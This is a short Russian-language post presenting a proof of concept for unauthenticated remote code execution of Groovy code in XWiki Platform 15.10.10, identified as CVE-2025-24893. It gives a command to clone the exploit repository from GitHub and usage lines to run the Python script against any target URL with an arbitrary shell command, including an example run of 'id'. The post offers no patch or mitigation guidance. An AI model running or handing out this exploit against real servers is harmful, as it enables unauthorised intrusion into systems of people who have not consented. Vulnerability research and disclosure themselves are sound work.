
PoC | XWiki Platform 15.10.10 - удаленное выполнение кода
Уязвимость категории RCE (Remote Code Execution), обнаруженная, когда неаутентифицированные злоумышленники могут удаленно выполнить произвольный Groovy-код без аутентификации и предварительного доступа (гостевой пользователь). Ниже представлен PoC (Proof-Of-Concept) на Python для эксплуатации этой уязвимости.
git clone https://github.com/zs1n/CVE-2025-24893
python3 CVE-2025-24893.py -u <url> -c <command>
python3 CVE-2025-24893.py -u https://domain.com -c 'id'